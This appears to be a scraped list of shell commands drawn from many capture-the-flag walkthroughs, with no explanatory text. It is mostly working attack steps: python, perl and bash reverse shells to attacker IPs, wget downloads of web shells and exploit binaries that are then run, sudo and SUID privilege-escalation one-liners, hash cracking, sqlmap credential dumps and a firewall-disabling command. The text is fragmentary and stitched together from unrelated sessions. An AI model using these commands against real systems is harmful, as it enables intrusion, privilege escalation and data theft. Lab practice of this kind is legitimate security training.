Total number of challenges: 913

netdiscover
nmap -p- -sV 192.168.1.10
echo “192.168.1.10 terratest.earth.local”
echo “192.168.1.10 earth.local”
cat /etc/hosts
nmap 192.168.1.11 -p- -sV
enum4linux -a 192.168.1.11
enum4linux -a 192.168.1.11
nc -lvp 1234
cat /etc/issue
uname -a
find / -perm -4000 -type f 2>/dev/null
getcap -r / 2>/dev/null
ls -la
tar -xf password.tar
cat .old_pass.bak
su root
cat r00t.txt
nmap 192.168.1.11 -p- -sV
nc -lvp 1234
cat user.txt
gcc -pthread dirty.c -o dirty -lcrypt
cat proof.txt
ssh john@192.168.1.18
cat flag2.txt
cat clue.txt
sudo -l
cat /etc/issue
find / -perm -u=s -type f 2>/dev/null
getcap -r / 2>/dev/null
john shadow –wordlist=/usr/share/wordlists/rockyou.txt
su parth
cat flag.txt
cat honey.txt
sudo -l
cat /home/honey/../backup.py
echo $$
pkttyagent –process 12772
pkexec su -l root
id
cat capture/flag1.txt
cat honey/flag4.txt
cat john/flag2.txt
cat parth/flag3.txt
netdiscover
nmap 192.168.1.10 -p- -sV
echo “NjMgNjEgNzAgNzQgNzUgNzIgNjUgM2EgNjggNzUgNmUgNzQgNjkgNmUgNjc=” | base64 -d
ftp 192.168.1.18
steghide –extract -sf .get.jpg
steghide –extract -sf .get.jpg
netdiscover
nmap 192.168.1.13 -p- -sV
set RHOSTS 192.168.1.13
set USERNAME draco
set PASSWORD slytherin
set TARGETURI /DiagonAlley
id
find / -perm -4000 -type f 2>/dev/null
echo CODE | base32 -d
john hash –wordlist=/usr/share/wordlists/rockyou.txt
cat
su dobby
less flag1.txt
tail proof.txt
netdiscover
nmap -p- -sV 192.168.1.24
ftp 192.168.1.24
exit
cat flag1.txt
cat word.dir
cat /etc/issue
uname -a
sudo -l
sudo /usr/bin/vim
id
cat flag2.txt
john /tmp/hash –wordlist=/usr/share/wordlists/fasttrack.txt
chmod 600 key
ssh -i key icex64@192.168.1.15
cat user.txt
cat /etc/issue
uname -a
sudo -l
cat /home/arsene/heist.py
sudo -u arsene /usr/bin/python3.9 /home/arsene/heist.py
find / -type f -prem -ug=rwx 2>/dev/null
nc -lvp 1234
sudo -l
cat root.txt
nmap 192.168.1.15 -p- -sV
ffuf -u ‘http://192.168.1.15/~FUZZ’ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -e .php,.txt
ffuf -u ‘http://192.168.1.15/~secret/.FUZZ’ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -e .php,.txt -fc 403
cat
netdiscover
nmap 192.168.1.16 -p- -sV
nc -lvp 1234
cat flag.txt
cat /etc/issue
uname -a
ls -la
john Swordofgryffindor –wordlist=.secret.dic
su lestrange
sudo -l
sudo vim -c ‘:!/bin/bash’
cat root.txt
netdiscover
nmap 192.168.1.23 -p- -sV
echo -n “beelzebub” | md5sum
ssh krampus@192.168.1.23
cat /etc/issue
uname -a
sudo -l
ls -la
cat
gcc exp.c
chmod +x a.out
cat user.txt
cat root.txt
nc -lvp 1234
export TERM=screen
cat /etc/issue
uname –a
ls -la
unzip user_backup.zip
zip2john user_backup.zip > hash
john hash –wordlist=/usr/share/wordlists/rockyou.txt
unzip user_backup.zip
cat user.txt
sudo -l
cat easysysteminfo.py
ls -la
cat
gcc infosec.c -o easysysinfo
sudo /home/randy/tools/easysysinfo
cd /root
cat root.txt
netdiscover
nmap 192.168.1.16 -p- -sV
ffuf -u http://192.168.1.16/blog-post/archives/randylogs.php?FUZZ=/etc/passwd -w /usr/share/wordlists/dirb/small.txt -fs 0
ssh infosec@192.168.1.16
nmap 192.168.1.21 -p- -sV
ffuf -u ‘http://192.168.1.21/secret/evil.php?FUZZ=/etc/passwd’ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -fs 0
cat
chmod 600 key
ssh -i key mowree@192.168.1.21
john hash –wordlist=/user/share/wordlists/rockyou.txt
ssh -i key mowree@192.168.1.21
id
cat /etc/issue
uname -a
sudo -l
cat user.txt
ls -l /etc/passwd
cat
cat /etc/passwd
su infosec
id
cat root.txt
netdiscover
nmap 192.168.1.60 -sV -p-
echo “192.168.1.60 deathnote.vuln”
file important.jpg
cat important.jpg
ls user pass -l
hydra -L user -P pass 192.168.1.16 ssh
ssh l@192.168.1.16
cat /etc/issue
uname -a
sudo -l
cat case.wav
su kira
sudo -l
sudo su
cat root.txt
netdiscover
nmap -sV -p- 192.168.1.25
cat jwt.txt
john jwt.txt –wordlist=/usr/share/wordlists/rockyou.txt –format=HMAC-SHA256
ssh berlin@192.168.1.21
cat flag 1.txt
python –m SimpleHTTPServer 8000
wget 192.168.1.21:8000/convo2.pcapng
cd professor
cat finalflag.txt
cat passwd.txt
su professor
cat finalflag.txt
sudo -l
cat finalflag.txt
cat flag2.txt
cat flag3.txt
netdiscover
nmap -p- -sV 192.168.1.19
nc -lvp 1234
cat /etc/issue
uname -a
mv 15285 15285.c
gcc 15285.c
ls
cat /root/key.txt
cat
sqlmap -r sql
sqlmap -r sql –dbs
sqlmap -u sql doubletruble –tables
sqlmap -r sql -D doubletrouble -T users –columns
sqlmap -r sql -D doubletrouble -T users -C password,username –dump
ssh clapton@192.168.1.24
cat user.txt
gcc -pthread exploit.c -o dirty -lcrypt
su firefart
cat /root/root.txt
git clone https://github.com/pentestmonkey/php-reverse-shell.git
vi php-reverse-shell.php
python 48146.py
nc -lvp 1234
cat /etc/issue
uname -a
sudo -l
sudo awk ‘BEGIN {system(“/bin/bash”)}’
cd /root
cp doubletrouble.ova /var/www/html/
cd /var/www/html/
netdiscover
netdiscover
nmap 192.168.1.28 -p- -sV
steghide –extract -sf doubletrouble.jpg
steghide –extract -sf doubletrouble.jpg
arp-scan -l
nmap -sV -p- 192.168.1.21
echo “192.168.1.21 wp.looz.com”
hydra -l gandalf -P /user/share/wordlists/rockyou.txt 192.168.1.21 ssh
ssh gandalf@192.168.1.21
cat /etc/issue
uname -a
sudo -l
find / -prem -4000 -type f -exec ls -al{} \; 2>/dev/null
cat /root/root.txt
nmap -p- -sV 192.168.1.21
ffuf -r -c -ic -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u ‘http://192.168.1.21/test.php?FUZZ=/etc/passwd’ -fs 80
chmod 400 key
ssh -I qiu@192.168.1.21
cat /etc/issue
uname -a
sudo -l
cat local.txt
cat .bash_history
su qiu
sudo -l
cat proof.txt
nc -lvp 1234
cat /etc/issue
uname -a
cd linux-exploit-suggester/
wget 192.168.1.23:8001/linux-exploit-suggester.sh
ps -eaf | grep root
chmod +x inject.py
nc 192.168.1.12 5600
arp-scan -i
nmap -sV -p- 192.168.1.7
echo “192.168.1.7 hackers.blackhat.local”
dig hackers.blackhat.local @192.168.1.7
echo “192.168.1.7 hackerskid.blackhat.local.”
nmap -p- -sV 192.168.1.24
msfconsole
set RHOSTS 192.168.1.24
set TARGETURI /cgi-bin/shell.sh
python -c ‘import pty;pty.spawn(“/bin/bash”)’
cat /etc/issue
uname -a
sudo -l
cat /home/thor/./hammer.sh
sudo -u thor /home/thor/./hammer.sh
sudo -u thor /home/thor/./hammer.sh
sudo -l
sudo service ../../bin/bash
cat proof.txt
netdiscover
nmap –p- -sV 192.168.1.18
dirb http://192.168.1.18
ftp 192.168.1.18
hydra -l pwnlab -P /usr/share/wordlists/rockyou.txt 192.168.1.18 ssh -v
ssh pwnlab@192.168.1.18
cat /etc/issue
uname -a
sudo -l
sudo /usr/bin/find /home/ -exec /bin/bash \;
id
nmap -sV -p- 192.168.1.26
mv 44374 44374.py
chmod +x 44374.py
python 44374.py
mv php-reverse-shell.php /var/www/html
vim php-reverse-shell.php
nc -lvp 1234
python -c ‘import pty;pty.spawn(“/bin/bash”)’
cat /etc/issue
uname -a
cat configure.php.bak
cat ./usr/share/doc/example/cron.sh
su root
cat root.txt
nmap -sV -p- 192.168.1.26
echo “MTAwMDA=” | base64 –decode
apt-get install steghide -y
steghide –extract -sf 3.jpg
nmap -p- -sV 192.168.1.24
ftp 192.168.1.24
unzip sshpass.zip
zip2john sshpass.zip
john hash –wordlist=/usr/share/wordlists/rockyou.txt
unzip sshpass.zip
cat /etc/issue
uname -a
sudo -l
python -c ‘import pty;pty.spawn(“/bin/bash”)’
import pty;
cat /etc/issue
uname -a
sudo -l
sudo find . -exec /bin/bash \; -quit
cat user.txt
nmap -sV -p- 192.168.1.26
nmap -p21 -sV 192.168.1.21
msfconsole
set RHOSTS 192.168.1.21
set payload cmd/unix/reverse
fping -aqg 192.168.1.0/24
nmap -sV -p- 192.168.1.22
cat
sqlmap -r request
nc -lvp 1234
cat local.txt
cat /etc/issue
uname -a
find / -prem -4000 -type f -exec ls -al {} \; 2>/dev/null
cat /etc/crontab
echo “bash -i >& /dev/tcp/192.168.1.25/3434 0>&1”
nc -lvp 3434
sudo -l
sudo tar -cf /dev/null /dev/null –checkpoint=1 –checkpoint-action=exec=/bin/bash
python -c ‘import pty;pty.spawn(“/bin/bash”)’
netdiscover
nmap -p- -sV 192.168.1.31
echo eW91IGZpbmQgdGhlIGhpZGRlbiBkaXI= | base64 –decode
echo VWtaS1FsSXdPVTlKUlVwQ1ZFVjNQUT09 | base64 –decode
echo UkZKQlIwOU9JRUpCVEV3PQ== | base64 –decode
echo RFJBR09OIEJBTEw= | base64 –decode
apt-get install steghide -y
steghide –extract -sf aj.jpg
pip3 install stegcracker
steghide –extract -sf aj.jpg
chmod 600 id rsa
cat /etc/issue
uname -a
ls -la
cd /tmp
echo “/bin/bash” > ps
chmod +x ps
export PATH=/tmp:$PATH
which ps
cat proof.txt
netdiscover
nmap -sV -p- 192.168.1.25
nc -lvp 1234
id
python -c ‘import pty;pty.spawn(“/bin/bash”)’
ls -la
su py
cat user.txt
cat backup.cc
openssl passwd -1 -salt INFOSEC infosec
su infosec
netdiscover
nmap 192.168.1.14 -sV -p-
nc -lvp 1234
cat /etc/issue
uname -a
ls -l
cd /tmp
echo “/bin/bash” > id
chmod +x id
export PATH=/tmp:$PATH
which id
cat user.txt
cat password
sudo -l
echo ‘import os;os.system(“/bin/bash”)’ > file.py
sudo /user/bin/python3 /home/john/file.py
id
cat root.txt
netdiscover
nmap –p- -sV 192.168.1.23
ssh rtemis@192.168.1.19
ls -la
ls -la
hydra -L user.txt -P pass.txt 192.168.1.19 ssh -s 7223
uname -a
cat /etc/issue
ls -la
cat .mysql_history
su
cat /root/flag2.txt
netdiscover
nmap -p- -sV 192.168.1.24
ftp 192.168.1.24
ls
nc -lvp 1234
id
cat /etc/issue
uname -a
cat /.runme.sh
su shrek
cat user.txt
sudo -l
sudo /usr/bin/python3.5 -c ‘import pty;pty.spawn(“/bin/bash”)’
cat /root/root.txt
nmap -sV -p- 192.168.1.26
ssh auxerre@192.168.1.14
cat user.txt
uname -a
cat /etc/issue
ps -aux
redis-cli
su
netdiscover
nmap –p- -sV 192.168.1.23
dirb http://192.168.1.30/
cat
ssh agentr@192.168.1.30 -i key
john key hash –wordlist=/usr/share/wordlists/rockyou.txt
chmod 600 key
ssh -i key agentr@192.168.1.30
cat user.txt
cat /etc/issue
uname -a
ls –l /etc/passwd
vi /etc/passwd
su
cat root.txt
ssh admin@192.168.1.21
id
nc -lvp 1234
uname -a
cat /etc/issue
cat flag1.txt
mysql –u alfauser –p
cat /etc/passwd
su proxima
cat user.txt
find / -perm -4000 -type f -exec ls -al {} \; 2>/dev/null
getcap -r / 2>/dev/null
cat /root/root.txt
netdiscover
nmap -sV -p- 192.168.1.25
ssh webmaster@192.168.1.15
cat user_flag.txt
cat /etc/issue
uname -a
sudo -l
cat notes.txt
sudo -l
ln -s /bin/vi tail
export PATH=.:$PATH
sudo –preserve-env=PATH /usr/bin/check_syslog.sh
cat flag.txt
nmap -p- -sV 192.168.1.21
nmap -p- 192.168.1.21 -v
msfconsole
set RHOSTS 192.168.1.25
set RPORT 9001
python –c ‘import pty;pty.spawn(“bin/bash”);’
cat /etc/issue
uname -a
cat tyrell.pass
su tyrell
sudo -l
sudo /bin/journalctl
cat root.txt
netdiscover
nmap -p- -sV 192.168.1.25
echo “192.168.1.25 society.web”
apt-get install joomscan
netdiscover
nmap –p- -sV 192.168.1.23
netdiscover
ssh ripper@192.168.1.23
cat flag.txt
cat /etc/issue
uname -a
cat secret.files
su cubes
msfconsole
set RHOSTS 192.168.1.23
set PASSWORD tokiohotel
set USERNAME admin
set SSL true
id
cat /root/flag.txt
mysql -u root -h 192.168.1.18 -p
ssh lucy@192.168.1.18
cat /etc/issue
uname -a
sudo -l
cat /opt/exp.py
ls -l
nc -lvp 1234
sudo -u root /usr/bin/python2 /opt/exp.py
cat /root/root.txt
netdiscover
msfconsole
set RHOSTS 192.168.1.29
set USERNAME admin
set PASSWORD adam14
set TARGETURI /wordpress
uname -a
cat /etc/issue
su wpadmin
cat local.txt
sudo -l
sudo /usr/bin/mysql -u root -D wordpress -p
cat /root/proof.txt
netdiscover
nmap -p- -sV 192.168.1.19
wpscan –url http://192.168.1.19 –api-token ntCJoKnWhw3NzmHKDbqEj5ukJshug44GQrxcRTaXZ14 –plugins-detection aggressive
wpscan –url http://192.168.1.19 -e
wpscan –url http://192.168.1.21 -U c0ldd -P /usr/share/wordlists/rockyou.txt
cd /usr/share/webshells/php
nc -lvp 1234
cat /etc/issue
uname -a
cat user.txt
su c0ldd
cat user.txt
sudo -l
sudo ftp
id
cat root.txt
netdiscover
nmap 192.168.1.19 -sV -p-
msfconsole
set RHOSTS 192.168.1.19
set RPORT 8080
set HttpPassword tomcat
set HttpUsername tomcat
cat requests
sqlmap -r request
sqlmap -r request  –dbs
sqlmap -r request  -D clover –tables
sqlmap -r reqeust -D clover –tables –time-sec=60
sqlmap -r reqeust -D clover -T users -C username,password –dump
ls
cat local.txt
cat /etc/issue
uname -a
cd /home/sword/
cat passwd.sword
crunch 12 12 0123456789 -t “P4SsW0rD@@@@”  -o password
hydra -l sword -P password ssh://192.168.1.15 -t 4
cat local2.txt
find / -type f -perm -ug=rwx 2>/dev/null
cat /root/proof.txt
netdiscover
nmap 192.168.1.20 -sV -p-
ssh carls@192.168.1.20 -p3042
cat /etc/issue
uname -a
sudo -l
sudo -u c0ldd /bin/bash
sudo -l
cat user.txt
echo TXV5IGJpZW4gaGVjaG8gOik= | base64 decode
ls -la
rm DoNotRun.py
echo “import os os.system(“/bin/bash”)” > DoNotRun.py
sudo -u root /usr/bin/python3 /home/c0ldd/DoNotRun.py
id
cat /root/root.txt
echo “RmVsaWNpZGFkZXMgY3JhY2s=” | base64 -d
netdiscover
apt-get install steghide -y
steghide –extract -sf trytofind.jpg
cat data.txt
hydra -l renu -P /usr/share/wordlists/rockyou.txt 192.168.1.21 ssh
id
cat /etc/issue
uname -a
cat user1.txt
cat /home/lily/user2.txt
cat authorized_keys
sudo -l
nc -lvp 1234
cat .root.txt
netdiscover
nmap 192.168.1.16 -p- -sV
cd maintenance
ls
cat test.txt
cat test2.txt
cat locate.txt
echo cGluZyBwb25n | base64 –decode
cd /
cd /home
ls -la
cat .backup
john bb.txt –wordlist=/usr/share/wordlist/rockyou.txt
nc -lvp 1234
cat /etc/issue
uname -a
su Jeevan
docker run -v /:/mnt –rm -it alpine chroot /mnt sh
cat /root/root.txt
netdiscover
nmap -sV -p- 192.168.1.25
cat
ifconfig eth0
cat
nc -lvp 1234
id
cat /etc/issue
uname -a
su takis
cat user.txt
sudo -l
sudo su
cat /root/root.txt
find . -name “root” 2>/dev/null
cat /usr/games/USB/root
nmap -Pn -p- 192.168.1.21
cat etc_passwd
python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“192.168.1.22”,1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’
nc -lvp 1234
cat /etc/issue
uname -a
python –version
id
cat /root/proof.txt
nmap 192.168.1.26 -p- -sV
nmap 192.168.1.26 -p 80 –script=http-enum
cat
id
uname -a
cat /etc/issue
sudo -l
sudo gcc –wrapper /bin/sh,-s .
cat /root/root.txt
netdiscover
nmap 192.168.1.18 -p- sV
cat .Note.txt
nmap -p- -sV 192.168.1.105
msfconsole
set rhosts 192.168.1.105
set targeturi /music/wordpress/
set target 0
id
cat notes.txt
ls -l secretdiary
file secretdiary
strings secretdiary
netdiscover
nmap 192.168.1.14 -sV -p-
echo “192.168.1.13 odin”
echo system($_REQUEST[‘cmd’]);
set RHOSTS 192.168.1.9
set username admin
set password qwerty
uname -a
cat /etc/issue
cat /var/www/html/wp-config.php
john pass
su root
netdiscover
nmap 192.168.1.16 -sV -p-
cat /etc/issue
uname -a
mv 45010 45010.c
gcc 45010
cat /root/flag.txt
netdiscover
nmap -p- -sV 192.168.1.11
nc -lvp 1234
id
cat /etc/issue
uname -a
ls -ltr
cd supersecret-for-aziz
cat bassam-pass.txt
su assam
sudo -l
sudo find . -exec /bin/sh \; -quit
cat /root/flag.txt
netdiscover
nmap 192.168.1.14 -sV -p-
ifconfig eth0
nc -lvp 1234
uname -a
cat /etc/issue
cat user.txt
sudo -l
cat /root/root.txt
nmap -sV -p- 192.168.1.19
uname -a
cat /etc/issue
mv 45010 45010.c
gcc 45010.c
chmod +x a.out
ifconfig
nc -lvp 443
uname -a
cat /etc/issue
sudo -l
find / -group ipsum -print 2>/dev/null
sudo -u ipsum /usr/bin/cat /var/www/example.com/html/…/nothing_to_see_here
sudo -l
sudo –u /usr/bin/base64 /etc/shadow
base64 -d shadow
john –wordlist=rockyou.txt hash1
su zerocewl
john –wordlist=rockyou.txt hash2
su cewlbeanss
sudo -l
su cewlbeans
sudo -l
cat /root/root.txt
netdiscover
nmap 192.168.1.14 -sV -p-
nmap -sC -sV -oA Omni 10.10.10.204
netdiscover
cat user.txt
uname -a
cat /etc/issue
find / -prem -u=s -type f 2>/dev/null
mv 47009 47009.c
gcc 47009.c
wget 192.168.1.17/bb/a.out
chmod +x a.out
cat /root/root.txt
netdiscover
nmap 192.168.1.14 -sV -p-
echo “192.168.1.22 votenow.local”
wfuzz -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -H “HOST: FUZZ.votenow.local” –hw 854 –hc 400 -t 100 192.168.1.22
echo “192.168.1.22 datasafe.votenow.local”
nano simple.txt
cat user.txt
nmap -p- -sV 192.168.1.101
mysql -h 192.168.1.101 -u root -p
ls -la
cat .htpasswd
su armour
sudo -l
cat flag.txt
nmap 192.168.1.30 -p- -sV
cat flag2.txt
cat finalflag.txt
netdiscover
nmap 192.168.1.26 -p- -sV
dirb
smbclient -I 192.168.1.26 -L -N
cat mailsent.txt
dirb
cat cred.txt
sudo -l
sudo -u root /root/lago
strings .pyc
wget 192.168.1.53:9765/.pyc
file .pyc
apt-get install python3
apt-get install python3-pip
pip3 install uncompyle6
sudo /root/lago
nc -lvp 1234
find / -type f -perm -u=s 2>/dev/null
strings /usr/local/bin/apache2-restart
nmap -p- -sV 192.168.1.103
netdiscover
nmap -sV 192.168.1.22
msfconsole
id
cat /root/root.txt
nmap -p- -sV 192.168.1.4
dirb http://192.168.1.4
cewl http://192.168.1.4/
cat >> key
netdiscover
nmap -p- -sV 192.168.1.2
docker run -it -v /root:mnt/ignite ubuntu
netdiscover
id
dirb
sudo -l
nc -lvp 1234
ls -a
cat >> pass.txt
john pass.txt
cat clean.sh
nc -lvp 4444
gcc
netdiscover
nmap 192.168.1.16 -A
nc -lvp 1234
id
cat /etc/issue
uname -a
cd /home/love/Desktop
cat user.txt
cat /etc/crontab
cd /var/www/html
ls
cat finally.sh
cat write.sh
ls -l
cat /root/root.txt
nmap 192.168.1.20 -A
ifconfig
tail
ifconfig eth0
tail -f /var/www/apache2/access.log
sudo -l
apt-get install ruby ruby-dev rubygems build-essential
gem install –no-document fpm
mkdir exploit
cd exploit/
cat
ls
cd /tmp
wget 192.168.1.20/exploit_1.0_amd64.deb
chmod +x exploit_1.0_amd64.deb
sudo -u root /usr/bin/dpkg -i exploit_1.0_amd64.deb
cat /root/
cat proof.txt
wpscan –url http://192.168.1.11/ –enumerate u
cat
cat username.txt
ip add
timeout 140 tcpdump -w hehe.pcab -i veth0878a6c
tcpdump -r hehe.pcab
su paul
sudo -l
netdiscover
nmap -p- -Pn 192.168.1.112
netdiscover
nmap 192.168.1.113 -A
ftp 192.168.1.113
set RHOSTS 192.168.1.113
netdiscover
nmap -Pn -p- 192.168.1.103
hydra pop3://192.168.1.103 -L user.txt -P password.txt
nc 192.168.1.103 110
hydra ssh://192.168.1.103 -L user.txt -p “S1ck3nBluff+secureshell”
uname –a
cd /var/www/html/
mv 44298 44298.c
gcc 44298.c -o exploit
cd /tmp/
wget 192.168.1.107/exploit
chmod +x exploit
netdiscover
msfconsole
set rhosts 192.168.1.103
set targeturi drupal/
id
python –c ‘import pty; pty.spawn(“/bin/sh”)’
uname –a
cat /etc/issue
nmap 192.168.1.27 –Pn –p-
msfconsole
set rhost 192.168.1.27
set payload php/meterpreter/reverse_tcp
set lhost 192.168.1.23
set lport 4444
find -maxdepth 2 –type f -prem 777
ls –l /etc/passwd
openssl passwd -1 –salt infosec
su indishell
sudo –i
netdiscover
nmap 192.168.1.24 -p- -sV
dirb http://192.168.1.24:1898/
set rhost 192.168.1.24
set rport 1898
set payload php/meterpreter/reverse_tcp
set lhost 192.168.1.23
set lport 443
id
python -c ‘import pty;pty.spawn(“/bin/bash”)’
uname -a
cat /etc/issue
cat myplace.backup | base64 -d > myplace
file myplace
uname -a
cat /etc/issue
import socket,subprocess,os;
wget 192.168.1.45/pythonshell.py
cp pythonshell.py /srv/.antivirus.py
nc –lvp 4545
python -c ‘import pty;pty.spawn(“/bin/bash”)’
cd /home/devops
ls
cat flag2.txt
wget 192.168.1.45/bbbb/setup.py
sudo /usr/bin/pip install . –upgrade –force-reinstall
perl -e ‘use Socket;$i=”192.168.1.45″;$p=2323;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,”>&S”);open(STDOUT,”>&S”);open(STDERR,”>&S”);exec(“/bin/sh -i”);};’
if (_0xb252x4 == 1079950212331060) {
python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“192.168.100.11”,1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’&
sh -c $@|sh . echo ssh bill@localhost sudo -l
sh -c $@|sh . echo ssh bill@localhost sudo ufw disable
sh -c $@|sh . echo ssh bill@localhost sudo wget “http://10.0.2.15:8000/shell.jsp” -O /var/lib/tomcat8/webapps/ROOT/shell.jsp
ssh bill@localhost sudo bash -i>& /dev/tcp/10.0.2.15/4444 0>&1
strings
objdump
wget http://172.16.92.141/shell.txt -O /tmp/shell.php
php /tmp/shell.php;
python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“192.168.1.120”,4545));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’
ls -a